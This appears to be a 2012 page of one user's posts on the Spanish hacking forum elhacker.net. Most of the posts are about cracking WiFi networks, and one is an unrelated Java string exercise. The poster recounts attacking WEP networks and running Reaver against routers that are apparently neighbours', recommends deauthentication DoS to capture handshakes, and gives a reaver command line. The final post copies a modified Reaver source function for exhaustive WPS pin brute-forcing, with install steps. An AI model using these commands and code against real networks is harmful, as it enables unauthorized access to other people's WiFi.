elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16
101  Seguridad Informática / Wireless en Linux / Re: REAVER: Vulnerabilidad de WPA por WPS habilitado en: 9 Diciembre 2012, 10:12 am
Eso me ha ocurrido con algunos routers de timofónica....y no es la antena,porque he probado con varias...o no pasa del primer pin por defecto....o te arroja la wpa en segundos.
Es lo que tienen las WLAN_XXXX,...
Saliendo un poco del hilo,el otro día atacando una wep(qué cosas) y por no tirar de wlandecrypter y wepattack (como en los viejos tiempos),opté por beini....nada,ni se movían los datas...despues con airoscript y nada...luego con multiattack fijando un solo objetivo...y nada.
Por último caí en la cuenta de que tenía instalado wifyte(en xubuntu 10.10 por si le interesa a alguien saberlo) y me aventurá a probarlo y BINGO,este sí que hizo su trabajo y en poco más de 15 minutos....
Pero lo que me llamó la atención es que si fijas x objetivos,te dice hasta el tiempo estimado en juakearlos...lo cual me hará probar este programa de manera intensiva durante la noche,a ver qué me dice de las wpa.
Salud
102  Seguridad Informática / Hacking Wireless / Re: redes 802.11n con la ALFA NETWORKS AWUS036H en: 7 Diciembre 2012, 15:31 pm
kernel 2.6......no olvides este "pequeño" detalle... ;D
103  Seguridad Informática / Hacking Wireless / Re: redes 802.11n con la ALFA NETWORKS AWUS036H en: 5 Diciembre 2012, 09:35 am
Hola!

Recientemente va a llegarme esta tarjeta y me quede un poco decepcionado al ver que no soporta conexiones 802.11n, ya entiendo que no voy a poderme conectar a este tipo de redes, mi pregunta es servira para hackear las redes 802.11n, aunque después no pueda conectarse?

Saludos!

La mejor respuesta es que la pruebes tú mismo....tengo una alfa que "técnicamente" no soporta N pero "prácticamente" lo crakea todo... N es igual a mayor velocidad de transferencia de transmisión,.. de 54 Mbps a un máximo de 600 Mbps....lo máximo que soportan a nivel físico a/b/g son 300mbs...
104  Programación / Java / Re: Contar Lineas y Leer Fichero en: 29 Noviembre 2012, 23:00 pm
package leer_fichero;

public class Leer_Fichero {
//Muestra cómo obtener la longitud de una cadena de caracteres e investiga
   //la posición de un determinado caracter.
   /**Se aprovecharán varios métodos de la clase String para realizar las
    * operaciones sobre las cadenas de caracteres,tales como calcular su longitud,
    * extraer determinados caracteres o bien investigar qué caracter ocupa la
    * posición inicial o final de la cadena.En este ejercicio creo el objeto nombre
    * de la clase String al que se le asigna la cadena de caracteres "Bukanero".
    * El método lenght calcula la longitud de esta cadena.
 * El método indexOf("a") investiga en qué posición está la primera letra "a",empezando
    * por la izquierda
    *
    */
   public static void main(String[] args) {
      // TODO Auto-generated method stub
String nombre;
nombre = "Bukanero";
System.out.print(" El nombre " + nombre + " tiene " + nombre.length() + " caracteres\n ");
System.out.print(" El nombre " + nombre + " tiene la letra 'a' en la posición " +
      nombre.indexOf("a") + "\n");
System.out.println("Empieza por:"+ nombre.substring(0,1));
System.out.print("Termina por:" + nombre.substring(7));
   }

}

Y al ejecutarlo aparecerá esto:

El nombre Bukanero tiene 8 caracteres
  El nombre Bukanero tiene la letra 'a' en la posición 3
Empieza por:B
Termina por:o

105  Seguridad Informática / Wireless en Linux / Re: Alguna forma de evitar un ataque DoS? en: 29 Noviembre 2012, 11:12 am
los routers de orange son bastante buenos contra reaver....te lo digo por experiencia...ninguno de los que tengo al alcanze de mi antena se deja "querer",normalmente se autoproteje tras un número determinado de pines incorrectos...y así una y otra vez....
pero un ataque DOS es efectivo casi contra cualquier router...se realiza para obtener un handshake,al menos en teoría...
106  Seguridad Informática / Materiales y equipos / Re: Recomendación de Antenas Wifi en: 29 Noviembre 2012, 10:54 am
buenas noches y perdonar que me meta por medio.
soy juanpiratilla , la direccional de los chinos de 25 va de muerte.
no tiene mucho que envidiarle a muchas de las grandes

  :laugh:  :laugh: cuanta razón tienes....las marcas "nisu" suelen ser una caja de sorpresas(baratas y contundentes) y para colmo,te proporcionan un cd con back track , beini(o similares) que con 4 clicks hasta el más negao te hace una auditoría...
107  Seguridad Informática / Materiales y equipos / Re: PROBLEMAalfa AWUS036H 1000mw con realtek 8187L en: 29 Noviembre 2012, 10:48 am
Esa antena se muestra bastante inestable para navegar....no así para hacer auditorías y tal...
Es posible que al tener w7 no hayas habilitado el .exe del driver para que se compatibilize con un win2 xp,que creo que es una opcion que puedes elegir antes de lanzar el ejecutable....si es un modelo antiguo de alfa,los drivers serán para xp,aunque no debería ser un problema.
Desgraciadamente conozco este dato porque me he encontrado con el mismo problema(pero diferentes programas) en un curso de java con w7...tuvimos que virtualizar un xp para conseguir mas rentabilidad al SO...es decir,tira mejor eclipse virtualizando un xp en w7 ....increíble pero cierto. :laugh:
108  Seguridad Informática / Wireless en Linux / Re: REAVER: Vulnerabilidad de WPA por WPS habilitado en: 27 Noviembre 2012, 20:39 pm
¿has usado el -p XXXX?Parece ser que es obligatorio si usas la "nueva" modificación.
Las x corresponden a los cuatro primeros números del pin...

# sudo reaver -i eth1 -b ff:ff:ff:ff:ff --no-checksum -p XXXX -vv

Estaba pensando que si llegas al M6,entonces teóricamente los 6 primeros números del pin ya están chekeados....por lo tanto sólo quedarían 100 posibles combinaciones...desde XXXXXX00 hasta XXXXXX99...quizá probando -p xxxxxx con los 6 dígitos te funciona...lo ignoro porque no lo he probado( y ni siquiera sé si es posible hacerlo)...mas que nada porque todavía no me he encontrado con un router de estos para comprobarlo.Aunque así sería sencillísimo llegados al M7...pero tampoco hay manera por lo que he leido en google code.

En el código aportado por el autor(thanks Stefano)hay una modificación que estoy mirando con eclipse,intentando comprender qué y para qué....básicamente obliga a seguir a reaver a seguir probando pines ignorando el bug que tira del 99%...

  int i = 0, index = 0;

   /* If the first half of the pin was not specified, generate a list of possible pins */
   if(!get_static_p1())
Si no introduces la primera mitad del pin,se genera una lista con los posibles pins...y ahí es dónde creo que se produce el error,porque en esa lista generada no debe aparecer ese pin....si no,no lo entiendo.

else
   {
      /* If the first half of the pin was specified by the user, only use that */
      for(index=0; index<P1_SIZE; index++) 
      {
         set_p1(index, get_static_p1());
      }
   }

Si  la 1ª mitad del pin la especifica el usuario,se incrementa en una unidad cada petición de pin...
Etc,etc,etc.......
La sentencia else se lanza  en caso de que el anterior parámetro sea nulo y así dar una alternativa...
Aunque quizá estoy equivocado...

En fin...un rollo
109  Seguridad Informática / Hacking Wireless / Re: Hacking en wifis y estafa a Google Adwords en: 27 Noviembre 2012, 00:20 am
Buff... Cómo es posible entonces que yo haya recibido hasta 5.000 clicks falsos en un sólo día!!! ???

 :huh:

eso es lo que quieren que creas....tú mismo lo has explicado...mas clicks sobre tus banners,más gasto...el cual no puedes asumir.
Respecto a obtener la pass de los routers que tengas alrededor...pues por desgracia,es simple....y más con las herramientas que rulan de software libre por la red....mas las de android y similares.
Pero de ahí a hacer 5000 clicks en un día.....suponiendo que la jornada sea de 8 horas,sale a 0,17 clicks por segundo....o 10,41 por minuto...y a partir del tercer click con la misma ip,pues eso.
Tendría que pasarte google una relación espacio/tiempo en texto y ver el rango de clicks,desde dónde y en qué horas se producen...si es algo "lineal" o es algo que tiene picos de actividad a tal o cual hora....para empezar a pensar que es un "sabotaje" por parte de la competencia....aunque lo parezca a priori.
110  Seguridad Informática / Wireless en Linux / Re: Reaver-wifislax mod para problema 99% en: 26 Noviembre 2012, 23:34 pm
según el autor original del código(por cierto escrito en JAVA... ;-)),es posible evitar el tema del 99,99%,modificando unas líneas de código....en este enlace lo podéis seguir
http://code.google.com/p/reaver-wps/issues/detail?id=195#c41

Comment 41 by stefano....@gmail.com, Oct 22, 2012

I'm proud of you Tystar!
You tried harder than anybody else looking for the insight and then you saw the light.
So it's time to show that light to all the masses.

Assumptions:
-the router accepts WPS transaction so it's not giving you continuously "timeout".
-you know the first 4 digits of the pin (for example 0123 or 1234 or whatever)
retrieve these information using original reaver before applying the modification.
---------------------------------------------------------------------------------------------
download reaver:
svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only

open the file /root/reaver-wps-read-only/src/pin.c with a text editor
(save a copy you will need it to reinstall original reaver)
after #include "pins.h" SUBSTITUTE THE FIRST FUNCTION WITH THIS SAME FUNCTION (modified):

/* EXHAUSTIVE MOD. init */
/*
 * in these lines trivial modifications are applied over the original code.
 * these lines have to be considered for demonstration purpose only.
 * WPA PSK retrieval is not granted.
 * http://code.google.com/p/reaver-wps/issues/detail?id=195
 */

/* set global vars */
int exhaustive_last_digit = 9;
int exhaustive_index = 000;

/* Builds a WPS PIN from the key tables */
char *build_wps_pin()
{
        char *key = NULL, *pin = NULL;
        int pin_len = PIN_SIZE + 1;

        pin = malloc(pin_len);
        key = malloc(pin_len);
        if(pin && key)
        {
                memset(key, 0, pin_len);
                memset(pin, 0, pin_len);
     
                /* Generate a 7-digit pin */
                snprintf(key, pin_len, "%s%s", get_p1(get_p1_index()), get_p2(exhaustive_index));
           
                /* Append last digit */
                snprintf(pin, pin_len, "%s%d", key, exhaustive_last_digit);

                free(key);

      if(exhaustive_last_digit==0)
      {
         if(exhaustive_index==999)
         {
            cprintf(CRITICAL, "[-] Failed to recover WPS pin. \n");
            /* Clean up and get out */
            globule_deinit();
            exit(EXIT_FAILURE);         
         }
         exhaustive_index++;
         exhaustive_last_digit=9;
      }else{
         exhaustive_last_digit--;
      }
        }

        return pin;
}

/* EXHAUSTIVE MOD. end */

-actual reaver have to be uninstalled:

cd /root/reaver-wps-read-only/src
./configure
make distclean

-modified reaver have to be installed:

cd /root/reaver-wps-read-only/src
./configure
make
make install
---------------------------------------------------------------------------------------------
call reaver with the option -p 0123 where "0123" are the pin first 4 digits.
if you don't specify these 4 digits worst-case will take at least 10 years (3sec/pin * 10^8pin).
using the right 4 digits worst-case will take at least 10 hours (3sec/pin * 10^4).

to reinstall original reaver:
substitute modified pins.c with the original pins.c that you kept safe somewhere.
uninstall and install with same commands as above.
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines